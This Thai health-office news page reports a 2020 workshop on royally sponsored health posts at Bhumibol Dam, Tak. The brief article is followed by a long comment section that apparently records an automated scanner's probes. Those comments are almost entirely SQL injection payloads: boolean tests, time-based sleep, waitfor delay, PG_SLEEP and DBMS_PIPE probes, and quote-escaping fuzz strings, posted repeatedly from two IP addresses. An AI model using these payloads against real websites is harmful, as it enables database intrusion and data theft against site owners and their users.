สมัครสมาชิก
เข้าระบบ
ค้นหา

แลกเปลี่ยนเรียนรู้ สรุปบทเรียนสุขศาลาพระราชทานฯ By ศบส.2

หมวดหมู่ ข่าวประชาสัมพันธ์, เขตสุขภาพ 2, โดย Naruedon, วันที่ 8 กันยายน 63 / อ่าน : 1,822

@เขื่อนภูมิพล จังหวัดตาก วันที่ 3 - 4 สิงหาคม 2563 ศูนย์สนับสนุนบริการสุขภาพที่ 2 นำโดยนายนฤดล อ่วมสุข รองผู้อำนวยการศูนย์สนับสนุนบริการสุขภาพที่ 2 จัดประชุมเชิงปฏิบัติการแลกเปลี่ยนเรียนรู้ ส่งเสริม สนับสนุน การพัฒนาสุขศาลาพระราชทาน ฯ ปีงบประมาณ 2563 ณ เขื่อนภูมิพล ตำบลเขาแก้ว อำเภอสามเงา จังหวัดตาก โดยมีเครือข่ายการดำเนินงานสุขศาลาพระราชทานฯ จำนวน 3 แห่งคือ รร.ตชด.บ้านแม่จันทะ อำเภออุ้มผาง รร.ตชด.มรว.เฉลิมลักษณ์จันทรเสน อำเภอแม่ระมาด และ รร.ตชด.บ้านเลตองคุ อำเภออุ้มผาง เข้าร่วมประชุมแลกเปลี่ยนเรียนรู้การดำเนินงานร่วมกัน


Facebook Twitter Google+

แสดงความเห็น

20
8 มิ.ย. 67 16:18:45 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:18:47 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:19:35 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:20:34 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:21:18 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:21:52 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:21:54 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:21:55 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:21:57 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:21:59 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:22:01 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:22:39 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:23:10 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:24:06 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:24:53 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:25:24 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:26:08 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:26:45 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:27:29 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:28:38 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:28:43 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:29:23 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:29:28 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:29:49 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:29:58 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:30:24 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:30:30 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:30:31 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:30:33 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:30:36 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:30:38 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:30:56 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:31:22 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:31:31 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:32:03 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:32:14 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:32:16 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:32:17 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:32:20 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:32:43 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:33:04 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:33:24 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:33:38 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:34:05 IP 91.92.247.85 โดย : TzwSVsOw
555MI3cq24Z
8 มิ.ย. 67 16:34:18 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:34:58 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:35:10 IP 91.92.247.85 โดย : TzwSVsOw
-1 OR 2+329-329-1=0+0+0+1 --
8 มิ.ย. 67 16:35:12 IP 91.92.247.85 โดย : TzwSVsOw
-1 OR 3+329-329-1=0+0+0+1 --
8 มิ.ย. 67 16:35:14 IP 91.92.247.85 โดย : TzwSVsOw
-1 OR 2+550-550-1=0+0+0+1
8 มิ.ย. 67 16:35:21 IP 91.92.247.85 โดย : TzwSVsOw
-1 OR 3+550-550-1=0+0+0+1
8 มิ.ย. 67 16:35:29 IP 91.92.247.85 โดย : TzwSVsOw
-1' OR 2+611-611-1=0+0+0+1 --
8 มิ.ย. 67 16:35:31 IP 91.92.247.85 โดย : TzwSVsOw
-1' OR 3+611-611-1=0+0+0+1 --
8 มิ.ย. 67 16:35:33 IP 91.92.247.85 โดย : TzwSVsOw
-1' OR 2+226-226-1=0+0+0+1 or 'Z9LAxYMF'='
8 มิ.ย. 67 16:35:36 IP 91.92.247.85 โดย : TzwSVsOw
-1' OR 3+226-226-1=0+0+0+1 or 'Z9LAxYMF'='
8 มิ.ย. 67 16:35:38 IP 91.92.247.85 โดย : TzwSVsOw
-1" OR 2+377-377-1=0+0+0+1 --
8 มิ.ย. 67 16:35:40 IP 91.92.247.85 โดย : TzwSVsOw
-1" OR 3+377-377-1=0+0+0+1 --
8 มิ.ย. 67 16:35:41 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:36:01 IP 91.92.247.85 โดย : TzwSVsOw
555*if(now()=sysdate(),sleep(15),0)
8 มิ.ย. 67 16:36:32 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:36:43 IP 91.92.247.85 โดย : TzwSVsOw
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
8 มิ.ย. 67 16:37:05 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:37:24 IP 91.92.247.85 โดย : TzwSVsOw
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
8 มิ.ย. 67 16:37:47 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:38:01 IP 91.92.247.85 โดย : TzwSVsOw
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
8 มิ.ย. 67 16:38:21 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:38:47 IP 91.92.247.85 โดย : TzwSVsOw
555-1; waitfor delay '0:0:15' --
8 มิ.ย. 67 16:39:08 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:39:29 IP 91.92.247.85 โดย : TzwSVsOw
555-1); waitfor delay '0:0:15' --
8 มิ.ย. 67 16:39:56 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:40:09 IP 91.92.247.85 โดย : TzwSVsOw
555-1)); waitfor delay '0:0:15' --
8 มิ.ย. 67 16:40:42 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:40:54 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:40:56 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:40:58 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:41:00 IP 91.92.247.85 โดย : TzwSVsOw
555-1 waitfor delay '0:0:15' --
8 มิ.ย. 67 16:41:20 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:41:37 IP 91.92.247.85 โดย : TzwSVsOw
555nfgjsrsc'; waitfor delay '0:0:15' --
8 มิ.ย. 67 16:41:54 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:42:20 IP 91.92.247.85 โดย : TzwSVsOw
555KZ0zcyzW'); waitfor delay '0:0:15' --
8 มิ.ย. 67 16:42:59 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:43:25 IP 91.92.247.85 โดย : TzwSVsOw
555STHuIjfW')); waitfor delay '0:0:15' --
8 มิ.ย. 67 16:43:37 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:44:02 IP 91.92.247.85 โดย : TzwSVsOw
555-1 OR 94=(SELECT 94 FROM PG_SLEEP(15))--
8 มิ.ย. 67 16:44:17 IP 91.92.247.85 โดย : TzwSVsOw
555-1) OR 481=(SELECT 481 FROM PG_SLEEP(15))--
8 มิ.ย. 67 16:45:04 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:45:16 IP 91.92.247.85 โดย : TzwSVsOw
555-1)) OR 597=(SELECT 597 FROM PG_SLEEP(15))--
8 มิ.ย. 67 16:45:44 IP 91.92.247.85 โดย : TzwSVsOw
555S3ntUL8p' OR 309=(SELECT 309 FROM PG_SLEEP(15))--
8 มิ.ย. 67 16:46:33 IP 91.92.247.85 โดย : TzwSVsOw
5553Epz79iY') OR 515=(SELECT 515 FROM PG_SLEEP(15))--
8 มิ.ย. 67 16:47:07 IP 91.92.247.85 โดย : TzwSVsOw
555or6CCWDg')) OR 16=(SELECT 16 FROM PG_SLEEP(15))--
8 มิ.ย. 67 16:47:53 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:48:01 IP 91.92.247.85 โดย : TzwSVsOw
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
8 มิ.ย. 67 16:48:27 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:48:38 IP 91.92.247.85 โดย : TzwSVsOw
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
8 มิ.ย. 67 16:49:06 IP 91.92.247.85 โดย : TzwSVsOw
555'"
8 มิ.ย. 67 16:49:08 IP 91.92.247.85 โดย : TzwSVsOw
555????%2527%2522\'\"
8 มิ.ย. 67 16:49:09 IP 91.92.247.85 โดย : TzwSVsOw
@@f2NaD
8 มิ.ย. 67 16:49:11 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:49:14 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:50:05 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:50:11 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:50:54 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:50:58 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:51:33 IP 91.92.247.85 โดย : TzwSVsOw0nvBeYC4
20
8 มิ.ย. 67 16:51:37 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:52:36 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:52:39 IP 91.92.247.85 โดย : -1 OR 2+353-353-1=0+0+0+1 --
555
8 มิ.ย. 67 16:52:41 IP 91.92.247.85 โดย : -1 OR 3+353-353-1=0+0+0+1 --
20
8 มิ.ย. 67 16:52:42 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:52:43 IP 91.92.247.85 โดย : -1 OR 2+785-785-1=0+0+0+1
555
8 มิ.ย. 67 16:52:46 IP 91.92.247.85 โดย : -1 OR 3+785-785-1=0+0+0+1
555
8 มิ.ย. 67 16:52:48 IP 91.92.247.85 โดย : -1' OR 2+130-130-1=0+0+0+1 --
555
8 มิ.ย. 67 16:52:53 IP 91.92.247.85 โดย : -1' OR 3+130-130-1=0+0+0+1 --
555
8 มิ.ย. 67 16:52:55 IP 91.92.247.85 โดย : -1' OR 2+307-307-1=0+0+0+1 or '7VYi3WGu'='
555
8 มิ.ย. 67 16:52:57 IP 91.92.247.85 โดย : -1' OR 3+307-307-1=0+0+0+1 or '7VYi3WGu'='
555
8 มิ.ย. 67 16:52:59 IP 91.92.247.85 โดย : -1" OR 2+577-577-1=0+0+0+1 --
555
8 มิ.ย. 67 16:53:01 IP 91.92.247.85 โดย : -1" OR 3+577-577-1=0+0+0+1 --
20
8 มิ.ย. 67 16:53:12 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:53:47 IP 91.92.247.85 โดย : if(now()=sysdate(),sleep(15),0)
20
8 มิ.ย. 67 16:53:54 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:54:44 IP 91.92.247.85 โดย : TzwSVsOw0'XOR(if(now()=sysdate(),sleep(15),0))XOR'
20
8 มิ.ย. 67 16:54:53 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:55:22 IP 91.92.247.85 โดย : TzwSVsOw0"XOR(if(now()=sysdate(),sleep(15),0))XOR"
20
8 มิ.ย. 67 16:55:30 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:55:58 IP 91.92.247.85 โดย : (select(0)from(select(sleep(15)))v)/*'+(select(0)f
20
8 มิ.ย. 67 16:56:10 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:56:43 IP 91.92.247.85 โดย : TzwSVsOw-1; waitfor delay '0:0:15' --
20
8 มิ.ย. 67 16:56:50 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:57:30 IP 91.92.247.85 โดย : TzwSVsOw-1); waitfor delay '0:0:15' --
20
8 มิ.ย. 67 16:57:40 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:58:29 IP 91.92.247.85 โดย : TzwSVsOw-1 waitfor delay '0:0:15' --
20
8 มิ.ย. 67 16:58:38 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:58:40 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 16:58:46 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:59:13 IP 91.92.247.85 โดย : TzwSVsOw3Xc5j3qh'; waitfor delay '0:0:15' --
20
8 มิ.ย. 67 16:59:32 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 16:59:45 IP 91.92.247.85 โดย : TzwSVsOw4WarH5qM'); waitfor delay '0:0:15' --
20
8 มิ.ย. 67 17:00:15 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 17:00:46 IP 91.92.247.85 โดย : TzwSVsOwV3vCzULP')); waitfor delay '0:0:15' --
2082rnqB5Q
8 มิ.ย. 67 17:01:16 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 17:01:23 IP 91.92.247.85 โดย : TzwSVsOwMXVD2bbc' OR 699=(SELECT 699 FROM PG_SLEEP
20
8 มิ.ย. 67 17:01:57 IP 91.92.247.85 โดย : TzwSVsOw
-1 OR 2+183-183-1=0+0+0+1 --
8 มิ.ย. 67 17:01:59 IP 91.92.247.85 โดย : TzwSVsOw
-1 OR 3+183-183-1=0+0+0+1 --
8 มิ.ย. 67 17:02:00 IP 91.92.247.85 โดย : TzwSVsOw
-1 OR 2+640-640-1=0+0+0+1
8 มิ.ย. 67 17:02:02 IP 91.92.247.85 โดย : TzwSVsOw
-1 OR 3+640-640-1=0+0+0+1
8 มิ.ย. 67 17:02:04 IP 91.92.247.85 โดย : TzwSVsOw
-1' OR 2+755-755-1=0+0+0+1 --
8 มิ.ย. 67 17:02:06 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 17:02:06 IP 91.92.247.85 โดย : TzwSVsOwlS7EiC7j') OR 58=(SELECT 58 FROM PG_SLEEP(
-1' OR 3+755-755-1=0+0+0+1 --
8 มิ.ย. 67 17:02:09 IP 91.92.247.85 โดย : TzwSVsOw
-1' OR 2+519-519-1=0+0+0+1 or 'Jz4ReUt6'='
8 มิ.ย. 67 17:02:21 IP 91.92.247.85 โดย : TzwSVsOw
-1' OR 3+519-519-1=0+0+0+1 or 'Jz4ReUt6'='
8 มิ.ย. 67 17:02:24 IP 91.92.247.85 โดย : TzwSVsOw
-1" OR 2+180-180-1=0+0+0+1 --
8 มิ.ย. 67 17:02:25 IP 91.92.247.85 โดย : TzwSVsOw
-1" OR 3+180-180-1=0+0+0+1 --
8 มิ.ย. 67 17:02:27 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 17:02:42 IP 91.92.247.85 โดย : TzwSVsOwGhAxxMtO')) OR 479=(SELECT 479 FROM PG_SLE
20*if(now()=sysdate(),sleep(15),0)
8 มิ.ย. 67 17:03:00 IP 91.92.247.85 โดย : TzwSVsOw
555
8 มิ.ย. 67 17:03:10 IP 91.92.247.85 โดย : TzwSVsOw'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(
555
8 มิ.ย. 67 17:03:21 IP 91.92.247.85 โดย : TzwSVsOw'"
555
8 มิ.ย. 67 17:03:23 IP 91.92.247.85 โดย : TzwSVsOw????%2527%2522\'\"
555
8 มิ.ย. 67 17:03:25 IP 91.92.247.85 โดย : @@u0cvA
200'XOR(20*if(now()=sysdate(),sleep(15),0))XOR'Z
8 มิ.ย. 67 17:03:39 IP 91.92.247.85 โดย : TzwSVsOw
200"XOR(20*if(now()=sysdate(),sleep(15),0))XOR"Z
8 มิ.ย. 67 17:04:18 IP 91.92.247.85 โดย : TzwSVsOw
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
8 มิ.ย. 67 17:04:57 IP 91.92.247.85 โดย : TzwSVsOw
20-1; waitfor delay '0:0:15' --
8 มิ.ย. 67 17:05:35 IP 91.92.247.85 โดย : TzwSVsOw
20-1); waitfor delay '0:0:15' --
8 มิ.ย. 67 17:06:11 IP 91.92.247.85 โดย : TzwSVsOw
20-1)); waitfor delay '0:0:15' --
8 มิ.ย. 67 17:07:09 IP 91.92.247.85 โดย : TzwSVsOw
20-1 waitfor delay '0:0:15' --
8 มิ.ย. 67 17:07:54 IP 91.92.247.85 โดย : TzwSVsOw
20voB9Auxi'; waitfor delay '0:0:15' --
8 มิ.ย. 67 17:08:38 IP 91.92.247.85 โดย : TzwSVsOw
20xu4Es7P9'); waitfor delay '0:0:15' --
8 มิ.ย. 67 17:09:17 IP 91.92.247.85 โดย : TzwSVsOw
20NuxgxDkV')); waitfor delay '0:0:15' --
8 มิ.ย. 67 17:10:00 IP 91.92.247.85 โดย : TzwSVsOw
20-1 OR 139=(SELECT 139 FROM PG_SLEEP(15))--
8 มิ.ย. 67 17:11:03 IP 91.92.247.85 โดย : TzwSVsOw
20-1) OR 306=(SELECT 306 FROM PG_SLEEP(15))--
8 มิ.ย. 67 17:11:44 IP 91.92.247.85 โดย : TzwSVsOw
20-1)) OR 934=(SELECT 934 FROM PG_SLEEP(15))--
8 มิ.ย. 67 17:12:35 IP 91.92.247.85 โดย : TzwSVsOw
20A7rWNnO9' OR 13=(SELECT 13 FROM PG_SLEEP(15))--
8 มิ.ย. 67 17:13:20 IP 91.92.247.85 โดย : TzwSVsOw
20zI8t3gHZ') OR 307=(SELECT 307 FROM PG_SLEEP(15))--
8 มิ.ย. 67 17:14:14 IP 91.92.247.85 โดย : TzwSVsOw
20gdDCiKdT')) OR 718=(SELECT 718 FROM PG_SLEEP(15))--
8 มิ.ย. 67 17:14:49 IP 91.92.247.85 โดย : TzwSVsOw
20*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
8 มิ.ย. 67 17:15:22 IP 91.92.247.85 โดย : TzwSVsOw
20'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
8 มิ.ย. 67 17:15:58 IP 91.92.247.85 โดย : TzwSVsOw
20'"
8 มิ.ย. 67 17:16:00 IP 91.92.247.85 โดย : TzwSVsOw
20????%2527%2522\'\"
8 มิ.ย. 67 17:16:02 IP 91.92.247.85 โดย : TzwSVsOw
@@MOP85
8 มิ.ย. 67 17:16:06 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 17:16:44 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 17:17:31 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 17:18:18 IP 91.92.247.85 โดย : TzwSVsOwkBsBghBu
20
8 มิ.ย. 67 17:19:31 IP 91.92.247.85 โดย : TzwSVsOw
20
8 มิ.ย. 67 17:19:33 IP 91.92.247.85 โดย : -1 OR 2+308-308-1=0+0+0+1 --
20
8 มิ.ย. 67 17:19:35 IP 91.92.247.85 โดย : -1 OR 3+308-308-1=0+0+0+1 --
20
8 มิ.ย. 67 17:19:37 IP 91.92.247.85 โดย : -1 OR 2+463-463-1=0+0+0+1
20
8 มิ.ย. 67 17:19:39 IP 91.92.247.85 โดย : -1 OR 3+463-463-1=0+0+0+1
20
8 มิ.ย. 67 17:19:40 IP 91.92.247.85 โดย : -1' OR 2+257-257-1=0+0+0+1 --
20
8 มิ.ย. 67 17:19:42 IP 91.92.247.85 โดย : -1' OR 3+257-257-1=0+0+0+1 --
20
8 มิ.ย. 67 17:19:44 IP 91.92.247.85 โดย : -1' OR 2+176-176-1=0+0+0+1 or '1mBjxGAV'='
20
8 มิ.ย. 67 17:19:46 IP 91.92.247.85 โดย : -1' OR 3+176-176-1=0+0+0+1 or '1mBjxGAV'='
20
8 มิ.ย. 67 17:19:50 IP 91.92.247.85 โดย : -1" OR 2+42-42-1=0+0+0+1 --
20
8 มิ.ย. 67 17:19:52 IP 91.92.247.85 โดย : -1" OR 3+42-42-1=0+0+0+1 --
20
8 มิ.ย. 67 17:20:24 IP 91.92.247.85 โดย : if(now()=sysdate(),sleep(15),0)
20
8 มิ.ย. 67 17:20:59 IP 91.92.247.85 โดย : TzwSVsOw0'XOR(if(now()=sysdate(),sleep(15),0))XOR'
20
8 มิ.ย. 67 17:21:30 IP 91.92.247.85 โดย : TzwSVsOw0"XOR(if(now()=sysdate(),sleep(15),0))XOR"
20
8 มิ.ย. 67 17:22:05 IP 91.92.247.85 โดย : (select(0)from(select(sleep(15)))v)/*'+(select(0)f
20
8 มิ.ย. 67 17:22:56 IP 91.92.247.85 โดย : TzwSVsOw-1; waitfor delay '0:0:15' --
20
8 มิ.ย. 67 17:23:47 IP 91.92.247.85 โดย : TzwSVsOw-1); waitfor delay '0:0:15' --
20
8 มิ.ย. 67 17:24:31 IP 91.92.247.85 โดย : TzwSVsOw-1 waitfor delay '0:0:15' --
20
8 มิ.ย. 67 17:25:06 IP 91.92.247.85 โดย : TzwSVsOwKiPv4OtX'; waitfor delay '0:0:15' --
20
8 มิ.ย. 67 17:25:52 IP 91.92.247.85 โดย : TzwSVsOw9evTkcMY'); waitfor delay '0:0:15' --
20
8 มิ.ย. 67 17:26:29 IP 91.92.247.85 โดย : TzwSVsOw8QZQazIT')); waitfor delay '0:0:15' --
20
8 มิ.ย. 67 17:27:16 IP 91.92.247.85 โดย : TzwSVsOwxG8TRxyc' OR 723=(SELECT 723 FROM PG_SLEEP
20
8 มิ.ย. 67 17:28:01 IP 91.92.247.85 โดย : TzwSVsOwAaKA9F4l') OR 757=(SELECT 757 FROM PG_SLEE
20
8 มิ.ย. 67 17:28:33 IP 91.92.247.85 โดย : TzwSVsOwBCwgQuIT')) OR 124=(SELECT 124 FROM PG_SLE
20
8 มิ.ย. 67 17:29:10 IP 91.92.247.85 โดย : TzwSVsOw'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(
20
8 มิ.ย. 67 17:29:11 IP 91.92.247.85 โดย : TzwSVsOw'"
20
8 มิ.ย. 67 17:29:14 IP 91.92.247.85 โดย : TzwSVsOw????%2527%2522\'\"
20
8 มิ.ย. 67 17:29:17 IP 91.92.247.85 โดย : @@T1xj1
20
22 มิ.ย. 67 00:41:02 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 00:44:04 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 00:44:30 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 00:44:59 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 00:45:27 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 00:45:54 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 00:45:55 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 00:45:58 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 00:45:59 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 00:46:01 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 00:46:02 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 00:46:37 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 00:47:15 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 00:47:45 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 00:47:50 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 00:48:14 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 00:48:19 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 00:48:45 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 00:48:49 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 00:49:12 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 00:49:19 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 00:49:21 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 00:49:22 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 00:49:24 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 00:49:25 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 00:49:27 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 00:49:38 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 00:49:54 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 00:50:08 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 00:50:23 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 00:50:34 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 00:51:24 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 00:51:51 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 00:52:31 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 00:52:40 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 00:53:01 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 00:53:09 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 00:53:29 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 00:53:35 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 00:53:58 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 00:54:03 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 00:54:05 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 00:54:06 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 00:54:08 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 00:54:25 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 00:54:34 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 00:54:53 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 00:55:03 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 00:55:20 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 00:55:31 IP 91.92.249.108 โดย : dwUQQUrL
555
22 มิ.ย. 67 00:55:50 IP 91.92.249.108 โดย : dwUQQUrL
20
22 มิ.ย. 67 00:56:01 IP 91.92.249.108 โดย : dwUQQUrL
555
